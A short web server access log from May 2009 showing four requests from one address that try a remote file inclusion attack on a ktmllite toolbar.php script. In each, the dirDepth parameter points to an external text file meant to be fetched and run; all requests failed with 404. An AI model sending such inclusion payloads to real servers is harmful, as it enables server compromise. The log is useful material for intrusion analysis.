123.143.98.5 - - [19/May/2009:03:39:17 -0400] "GET /logs/access_log.Q108102400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:40:01 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:40:01 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:40:01 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
